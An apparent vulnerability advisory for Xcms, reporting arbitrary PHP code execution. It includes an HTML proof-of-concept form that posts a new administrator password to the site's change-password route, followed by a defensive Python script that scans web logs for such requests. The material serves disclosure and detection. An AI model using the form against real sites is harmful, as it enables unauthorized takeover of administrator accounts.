source: https://www.securityfocus.com/bid/25771/info

Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.

<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster (at) gmail (dot) com ] -
</pre>
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass">
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
<input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>
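
A defender-side check for the route in the form action above, as an added example that is not part of the original advisory: it scans web-server access logs for POST requests to the `pg=admin&s=cpass` password-change page, regardless of parameter order or percent-encoding. The Combined Log Format, the `index.php` path check, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Query parameters taken from the form action on this page
WATCHED = {"pg": "admin", "s": "cpass"}


def is_cpass_post(method, target):
    """True for a POST whose query string selects the password-change page."""
    parts = urlsplit(target)
    if method != "POST" or not parts.path.lower().endswith("index.php"):
        return False
    # parse_qs percent-decodes values, so pg=%61dmin is matched as well
    query = parse_qs(parts.query, keep_blank_values=True)
    return all(want in (v.lower() for v in query.get(key, []))
               for key, want in WATCHED.items())


def find_cpass_posts(lines):
    """Group matching requests by client: {ip: [(timestamp, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cpass_post(m["method"], m["target"]):
            hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)


# Constructed sample lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Sep/2007:10:01:02 +0200] "GET /index.php?lng=it&pg=admin HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [21/Sep/2007:10:02:40 +0200] "POST /index.php?lng=it&pg=admin&s=cpass HTTP/1.1" 200 812 "-" "-"',
    '203.0.113.9 - - [21/Sep/2007:10:02:55 +0200] "POST /index.php?s=cpass&pg=%61dmin HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [21/Sep/2007:10:03:10 +0200] "POST /index.php?lng=it&pg=contact HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in find_cpass_posts(SAMPLE_LOG).items():
        print(ip, events)
```

Matches are candidates for review against known administrator sessions and source addresses, since a legitimate password change produces the same request line.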